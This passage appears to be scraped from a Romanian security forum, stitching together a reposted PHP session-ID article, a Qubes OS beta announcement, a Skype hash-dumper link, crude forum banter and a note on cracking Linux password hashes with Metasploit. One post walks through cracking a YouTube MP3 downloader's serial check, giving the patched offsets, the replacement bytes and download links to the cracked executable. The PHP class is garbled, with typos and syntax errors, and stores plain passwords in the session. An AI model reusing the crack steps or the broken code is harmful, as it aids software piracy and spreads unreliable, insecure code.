impracticable to two people handling the same password. The class is really very simple, and to generate the session ID hash function we use md5() because there is no point if you are using something else such as Mcrypt. Below is the full code of a simple class to generate session IDs: <?php define("BUFFER_SIZE", 1024); define("SESSION_PATH", "user_sessions/"); define("SEPARATOR", "="); define("END_LINE", "\r\n"); class SessionIDGenerator { public function __construct(){ } public function sessionStart(&$session_array){ if(file_exists(SESSION_PATH.userHash())){ $file = fopen(SESSION_PATH.userHash(), "r"); flock($file, LOCK_SH); while($line = fgets($file, BUFFER_SIZE)){ list($variable, $value) = explode(SEPARATOR, $line); $session_array[trim($variable)] = trim($value); } flock($file, LOCK_UN); fclode($file); } else { $file = fopen(SESSION_PATH.userHash(), "w"); fclose($file); } } public function sessionClose(&$session_array){ if(file_exists(SESSION_PATH.userHash()) || isset($session_array)){ file = fopen(SESSION_PATH.userHash(), "w"); foreach($session_array as $variable => $value){ flock($file, LOCK_EX); fputs($file, $variable.SEPARATOR.$value.END_LINE); flock($file, LOCK_UN); } fclose($file); unset($session_array); return true; } else { return false; } } public function sessionDestroy()(&$session_array){ unlink(SESSION_PATH.userHash(); unset($session_array); return; } private function userHash(){ return md5($_SERVER['REMOTE_ADDR'].$_SERVER['user_agent']); } } ?> Now we have a mechanism to generate session IDs. How can I put it to use? It is also very simple. See for yourself: <?php $sessionIdGenerator = new SessionIdDenerator; $sessionIdGenerator->sessionStart(&$SessionArray); $SessionArray['login'] = "user"' $SessionArray['password'] = "password"; $sessionIdGenerator->sessionClose(); ?> At the moment, it makes no sense to write your own session management mechanism. Mechanisms built into PHP can quietly handle it. We just took a little bit better protection mechanisms in PHP sessions than standard. Summary The fact that even I took the PHP language testifies to its extraordinary popularity. In a previous article on PHP: InfoSec Institute Resources – Nine Wishes for Your PHP Applications I mentioned this to my requests for application developers. Today I raised another very important issue: the dangers associated with the session IDs. This is very important because a lot of hackers could create a mess. Although this is not the focus of this article, you should know that each session shown has expired. If it starts to use the information contained in this article, you have to be very hurried. There is, however, such a thing as a long-term session. So if we do not protect the programmer through good session ID generation, we probably won’t against long-term sessions. One day I’ll show you how we should write a much better session mechanism than the one built in to PHP. That is not the focus of today’s article. You should seriously consider the combinations if you are using the mechanism of the session. You can share user data stored in the database as part of the cookie, but the other part stored in the session. Mechanisms for handling session data are the most important for anyone who writes PHP applications. Therefore it is really worth it to devote a lot more time than some other PHP elements. I greet you and wish you many safe and successful PHP projects in the future. Sursa: InfoSec Institute Resources – PHP Session ID’s – The Risks

[h=1]Qubes 2 Beta 1![/h]by Mayuresh on December 31, 2012 Our first post regarding the Qubes OS can be found here. A few days ago Qubes 2 Beta 1 was released! This is the first Beta for Qubes Release 2 and introduces generic support for fully virtualized AppVMs (called HVMs in common Xen speak), and specifically initial support for Windows-based AppVMs integration. “Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system. Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.” [h=2]Changes made to Qubes:[/h] Support for generic fully virtualized VMs (without qemu in the TCB!) Support for Windows-based AppVMs integration (clipboard, file exchange, qrexec, pv drivers) Secure audio input to select AppVMs (Hello Skype users!) Clipboard is now also controlled by central policies, unified with other qrexec policies. Out of the box TorVM support Experimental support for PVUSB Updated Xorg packages in Dom0 to support new GPUs DisposableVM customization support … and, as usual, various fixes and other improvements Something new this time – unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. They are free to use for any Qubes 2 user. The tools are not part of the Qubes 2 installation ISO (which is GPL), and are down loadable on demand. Download Qubes: Qubes 2 Beta 1 – Qubes-R2-Beta1-x86_64-DVD.iso Sursa: Qubes 2 Beta 1! — PenTestIT

Skype Hash Dumper 1.0 Authored by Kevin Devine This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype. Download: http://packetstormsecurity.com/files/download/119155/skype_dump.zip Sursa: Skype Hash Dumper 1.0 ? Packet Storm

Inca exista persoane cu acea mentalitate "old school" care fac totul din placere si NU pentru bani. Cat timp vor exista astfel de persoane, "scena" va exista. Nu ne trebuie banii vostri, prefer sa iti dau VIP daca dai acei bani pentru o carte si imi demonstrezi ca ai citit-o si ca ai invatat ceva din ea, pentru ca apoi si altii sa invete de la tine. E trist sa vad cat de usor banii pot distruge pasiunea...

5

Da, acum l-am vazut si eu, imi place Iei, imi descarca automat to playlistu

Autor: Nytro © Romanian Security Team 2012 De obicei ascult muzica pe Youtube dar azi mi s-a pus pata sa imi descarc melodiile pe care le aveam in playlist. Si incerc eu niste site-uri, vad ca merg naspa, apoi caut si descarc un program pe care il gasesc aici: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu . Pare ok, aranjat, cand colo, ma trezesc ca imi descarca/converteste doar jumatate de melodie. Cum tot nu aveam ce face, am zis sa incerc sa ii fac un crack. Primul pas si cel care mi-a luat cel mai mult timp a fost sa gasesc unde se face verificarea serialului. Se putea face simplu cautand mesajul de eroare: 007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code." Am gasit pana la urma unde se face verificarea serialului dupa ceva chin: Pur si simplu in locul unui jnz care nu se executa pun un jmp. Nu era practic verificarea serialului, ci doar o verificare anterioara. .text:007D8AF7 test eax, eax Insa apoi se face verificarea si la fel, se face un salt catre portiunea de cod care ne arata ca serialul este incorect. O simpla transformare din jnz in jz e de ajuns. Procedura .text:007D9323 loc_7D9323: Fiind apelata de .text:007D8FAB jnz loc_7D9323 Am avut ceva probleme cu mai multe exceptii insa am trecut peste. Nu va recomand IDA deoarece nu poate "patch-ui" direct executabilul. In primul rand trebuie modificat ceva in config pentru a avea disponibil meniul de "Patch", apoi se creaza un "diff" cu ajutorul caruia se patch-uieste programul. Mai multe detalii aici: Marco Ramilli's Blog: How to Patch Binary with IDA Pro Patch-ul este banal: This difference file is created by The Interactive Disassembler Downloader.exe 003D8AF9: 0F E9 003D8AFA: 84 66 003D8AFB: 65 01 003D8AFC: 01 00 003D8FAC: 85 84 Iar in teste, programul crack-uit pare sa accepte orice serial: Am reinstalat programul, facea aceleasi figuri, am pus crack-ul in locul lui si pare sa functioneze, sa accepte orice serial: Bine, nu stia daca il putem denumi "crack" dar cam asta e. Si in sfarsit imi descarca si mie toata melodia: "CIA - Suntem tot aici.mp3" Download crack: https://rstforums.com/proiecte/Crack.exe Mirrors: http://www.speedyshare.com/2M4sa/Crack.exe http://www18.zippyshare.com/v/38589448/file.html PS: Puteti compara cu originalul, folositi "Compare It" sau orice altceva pentru a verifica diferentele, sunt doar vreo 5 bytes diferiti. Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html Thanks, // Nytro

Nu am baut nimic, dar sa fiu al dracu de am inteles ceva din tot carnatu asta. Nu am intrat in topicu cu "Unde faci Revelionul", dar intru acum, pentru ca sunt sigur ca e mai interesant. Nu va tine nimeni cu forta aici. Faptul ca sunteti aici e un privilegiu, nu un drept si in niciun caz o obligatie. Sunt sarbatorile, stau pe RST mai mult decat ar trebui, ar trebui sa imi bag pula in voi, ca nu meritati nimic, nu sa stau pe aici.

Da, hash-urile sunt citite din /etc/shadow, deci ai nevoie de root pentru a le putea citi...

Crack Linux Hashes Using Metasploit Framework Description: In this video I will show you how to crack Linux hashes using the Metasploit framework auxiliary module and make sure that your Database is connected with Metasploit – Framework or you will get errors. I’m using John the Ripper Auxiliary modules this module will allow you to crack your hashes and you can read your password in plain text but you have to use the dictionary for the brute-force attack. This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower. John the Ripper Linux Password Cracker | Metasploit Exploit Database (DB) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crack Linux Hashes Using Metasploit Framework